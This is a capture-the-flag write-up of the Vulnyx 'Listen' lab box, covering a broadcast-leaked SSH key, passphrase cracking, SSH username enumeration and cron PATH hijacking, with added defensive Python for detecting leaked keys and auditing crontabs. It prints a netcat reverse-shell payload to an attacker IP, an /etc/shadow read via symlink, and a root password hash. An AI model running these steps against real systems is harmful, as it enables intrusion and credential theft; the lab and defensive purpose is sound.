Vulnyx Listen
Todd

Information gathering

IP=192.168.0.187
nmap $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-31 12:59 HKT
Nmap scan report for 192.168.0.187
Host is up (0.014s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
8000/tcp open http-alt

Nmap done: 1 IP address (1 host up) scanned in 6.83 seconds

Port 8000 has an HTTP service.
The page is just one sentence:

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.7.3
Date: Fri, 31 May 2024 05:02:22 GMT
Content-type: text/html
Content-Length: 44
Last-Modified: Sat, 03 Jun 2023 18:24:27 GMT

You just have to listen to open the door...

Looks like Python's SimpleHTTP server.

First, scan for directories.

gobuster dir -u http://$IP:8000 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,bk,bak,zip,tar,gz,7z

Nothing turned up. Since it tells me to listen, it must be sending something and I need to listen for it? But I don't know the port or the destination, so let's capture traffic first and see.

Packet capture

Capture the traffic of $IP:

sudo tcpdump -i eth0 -A host $IP

Turns out it is broadcast traffic:

13:14:26.246879 IP 192.168.0.187.58770 > 255.255.255.255.65000: UDP, length 1743
E....p .@..=..............$b-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,F119F21F757AA02E
13:14:26.350237 IP 192.168.0.187 > 255.255.255.255: udp
E..#.p..@..=........Eez4qL/c1mFJpRJvydvQpZbK+TMSztBbioO4LyQ83YwEE64gzMfG2
MCq8vL2KWUhZTnIYS0OZIp8Zjxp7WrUJYdDH0U4EFZRI8kQhw2kfOA5gu+apFO1Z
DGHdCKgM6ZxjBpKPZZ3hDGmMCeDMP6HKCgjQ/MIYFP7y3+YXpBrKMAFRwwn1VlXI
5GL61FxMTq30oA3FEspUkN06K8yd/85LK7XS2OXwSo7AQckJghHswg==
-----END RSA PRIVATE KEY-----

Looks like it is broadcasting its private key.
Strip the surrounding packet data and save the key to a file:

vim id_rsa

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,F119F21F757AA02E
-----END RSA PRIVATE KEY-----

chmod 600 id_rsa
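Detection-side counterpart to the capture above, as an added example that is not part of the original writeup: it reassembles UDP datagram payloads (the key arrived split across two datagrams), finds PEM private-key blocks, and reads the Proc-Type/DEK-Info headers to report whether the key uses legacy OpenSSL PEM encryption, whose single-iteration MD5-based key derivation makes the passphrase cheap to brute-force. The datagram bytes are constructed; the DES-EDE3-CBC IV is the one shown in the capture.

```python
# Scan captured UDP payloads for leaked PEM private keys (added example, not code from the writeup).
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]*PRIVATE KEY)-----(.*?)-----END \1-----", re.S)


@dataclass
class KeyFinding:
    key_type: str          # e.g. "RSA PRIVATE KEY"
    encrypted: bool        # Proc-Type: 4,ENCRYPTED header present
    cipher: Optional[str]  # cipher named in DEK-Info, e.g. DES-EDE3-CBC


def find_leaked_keys(payload: bytes) -> List[KeyFinding]:
    """One finding per PEM private-key block in the payload, with its protection level."""
    findings = []
    for m in PEM_RE.finditer(payload):
        headers = {}
        for line in m.group(2).split(b"\n"):
            if b": " in line:  # base64 body lines never contain ": "
                k, v = line.strip().split(b": ", 1)
                headers[k.decode()] = v.decode()
        # Proc-Type/DEK-Info mark legacy OpenSSL PEM encryption: the key is derived
        # from the passphrase with one iteration of MD5-based EVP_BytesToKey.
        encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
        cipher = headers.get("DEK-Info", "").split(",")[0] or None
        findings.append(KeyFinding(m.group(1).decode(), encrypted, cipher))
    return findings


def scan_datagrams(datagrams: List[bytes]) -> List[KeyFinding]:
    """A key larger than one datagram arrives in pieces; scan the reassembled stream."""
    return find_leaked_keys(b"".join(datagrams))


# Constructed sample split across two datagrams like the capture above; the body is
# base64 of a marker string, not real key material. The IV is the one from the capture.
_BODY = base64.b64encode(b"constructed sample, not a real key").decode()
SAMPLE_DATAGRAMS = [
    b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
    b"DEK-Info: DES-EDE3-CBC,F119F21F757AA02E\n\n" + _BODY[:20].encode(),
    _BODY[20:].encode() + b"\n-----END RSA PRIVATE KEY-----\n",
]
```

Feeding the payloads of a real capture in arrival order (for example as exported from Wireshark) works the same way, since only the reassembled byte stream is inspected.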

Try logging in

ssh -i id_rsa root@$IP
Enter passphrase for key 'id_rsa':
root@192.168.0.187's password:

It needs a passphrase; crack it with john:

ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
idontknow (id_rsa)
1g 0:00:00:00 DONE (2024-05-31 13:25) 100.0g/s 134400p/s 134400c/s 134400C/s cuties..phoebe
Use the "--show" option to display all of the cracked passwords reliably

Got the passphrase: idontknow

Tried root; it didn't work, so the key is not root's. Looks like the username has to be brute-forced.

Checked an expert's walkthrough: https://www.bilibili.com/video/BV1mU411o7pQ/?spm_id_from=333.788&vd_source=3aefc8f78d21af4b1df44ab92654ae4e

Turns out it relies on an OpenSSH vulnerability that allows username enumeration.

Enumerating usernames

msfconsole
msf6 > search openSSH

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/manage/forward_pageant . normal No Forward SSH Agent Requests To Remote Pageant
1 post/windows/manage/install_ssh . normal No Install OpenSSH for Windows
2 post/multi/gather/ssh_creds . normal No Multi Gather OpenSSH PKI Credentials Collection
3 auxiliary/scanner/ssh/ssh_enumusers . normal No SSH Username Enumeration
4 \_ action: Malformed Packet . . . Use a malformed packet
5 \_ action: Timing Attack . . . Use a timing attack
6 exploit/windows/local/unquoted_service_path 2001-10-25 great Yes Windows Unquoted Service Path Privilege Escalation


Interact with a module by name or index. For example info 6, use 6 or use exploit/windows/local/unquoted_service_path

use auxiliary/scanner/ssh/ssh_enumusers


msf6 auxiliary(scanner/ssh/ssh_enumusers) > show options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_FALSE true no Check for false positives (random username)
DB_ALL_USERS false no Add all users in the current database to the list
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
USERNAME no Single username to test (username spray)
USER_FILE no File containing usernames, one per line


Auxiliary action:

Name Description
---- -----------
Malformed Packet Use a malformed packet



View the full module info with the info, or info -d command.


set USER_FILE /usr/share/wordlists/seclists/Usernames/Names/names.txt
set rhosts 192.168.0.187
run

[*] 192.168.0.187:22 - SSH - Using malformed packet technique
[*] 192.168.0.187:22 - SSH - Checking for false positives
[*] 192.168.0.187:22 - SSH - Starting scan
[+] 192.168.0.187:22 - SSH - User 'abel' found

Sure enough, it found the username: abel

Login

ssh -i ./id_rsa abel@$IP
Enter passphrase for key './id_rsa':
id
uid=1000(abel) gid=1000(abel) groups=1000(abel)

Privilege escalation

sudo -l
# no sudo,
# make a habit of checking the cron jobs:
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/dev/shm:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root cp /var/www/html/index.html /tmp

Found it: root copies index.html to /tmp every minute.
Check the permissions of index.html:

ls -l /var/www/html/index.html
-rw-r--r-- 1 abel abel 44 Jun 3 2023 /var/www/html/index.html

The file is owned by the logged-in user. So delete it, replace it with a symlink, and let root's privileges copy root's private key into /tmp.

rm /var/www/html/index.html
ln -s /root/.ssh/id_rsa /var/www/html/index.html
watch cat /tmp/index.html

Waited a long time with no result; .ssh/id_rsa probably doesn't exist. Try shadow instead:

rm /var/www/html/index.html
ln -s /etc/shadow /var/www/html/index.html
watch cat /tmp/index.html

root:$6$kehps0VQtaANi.xy$3vYwx8t6WSrRmBgMCFxwyoryLOYeESSGHufAjRYpvfjZcb5s/myJHSkchJ/LPDs3Nm2vvXb7cHz4wzSQ4asEL/:19511:0:99999:7:::

Got root's hash. Crack it with john:

john root.hash --wordlist=/usr/share/wordlists/rockyou.txt

It ran for a long time with no result; probably not the way in. Back to the cron job: root cp /var/www/html/index.html /tmp.
For that command, reading root.txt should be enough, but for a root shell the private key and shadow routes just tried have not panned out.
However, the top of the file also has: PATH=/usr/local/sbin:/dev/shm:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
The /dev/shm in there is a pretty obvious opening; I recall that path is shared memory and is writable.

abel@listen:/tmp$ ls -al /dev/shm
total 0
drwxrwxrwt 2 root root 40 May 31 06:56 .
drwxr-xr-x 17 root root 3180 May 31 06:56 ..

Sure enough. So I'll just plant a cp there:

echo "nc -e /bin/bash 192.168.0.30 4444" > /dev/shm/cp
chmod +x /dev/shm/cp
pwncat-cs -lp 4444
(remote) root@listen:/root# id
uid=0(root) gid=0(root) groups=0(root)
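An added defender-side audit (not code from the box or the writeup) for the cron weakness this escalation relied on: a PATH entry that is world-writable, combined with root jobs that invoke programs by bare name so that PATH is consulted. The crontab text is the one shown above; the writability check is injectable so the sample runs offline, and the separator and builtin handling is an assumption covering common /bin/sh syntax.

```python
# Audit a system crontab for root jobs whose bare command names could be shadowed via a world-writable PATH entry (added example, not the box's code).
import os
import shlex
import stat

SEPARATORS = {"&&", "||", ";", "|", "("}  # a new simple command starts after these
BUILTINS = {"cd", "test", "[", "exit", "exec", "set", "export"}  # /bin/sh builtins, never looked up in PATH


def world_writable(path: str) -> bool:  # other-write bit set, as on /dev/shm and /tmp
    return os.path.isdir(path) and bool(os.stat(path).st_mode & stat.S_IWOTH)


def program_names(command: str) -> list:
    """First word of each simple command in a /bin/sh command line, minus builtins."""
    progs, expect = [], True
    for tok in shlex.split(command):
        if tok in SEPARATORS:
            expect = True
        elif expect:
            expect = False
            if tok not in BUILTINS:
                progs.append(tok)
    return progs


def audit_crontab(text: str, writable=world_writable) -> list:
    """Report writable PATH entries and every bare program name they could shadow."""
    findings, path_dirs = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, value = line.partition("=")
        if sep and " " not in name:  # VAR=value line; only PATH matters here
            if name == "PATH":
                path_dirs = value.split(":")
                findings += [f"line {lineno}: PATH contains world-writable {d}"
                             for d in path_dirs if writable(d)]
            continue
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) < 7:
            continue
        shadow = next((d for d in path_dirs if writable(d)), None)
        for prog in program_names(fields[6]):
            if shadow and "/" not in prog:  # bare name is resolved through PATH
                findings.append(f"line {lineno}: {fields[5]} job runs bare '{prog}', "
                                f"shadowable by {shadow}/{prog}")
    return findings


SAMPLE_CRONTAB = """PATH=/usr/local/sbin:/dev/shm:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root cp /var/www/html/index.html /tmp
"""  # crontab lines as shown in the writeup: the hourly job plus the custom cp job
```

On a live host, `audit_crontab(open("/etc/crontab").read())` uses the real stat-based check; the fix it points at is a PATH limited to root-owned directories and absolute program paths in root jobs.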

Done 🎉🎉🎉
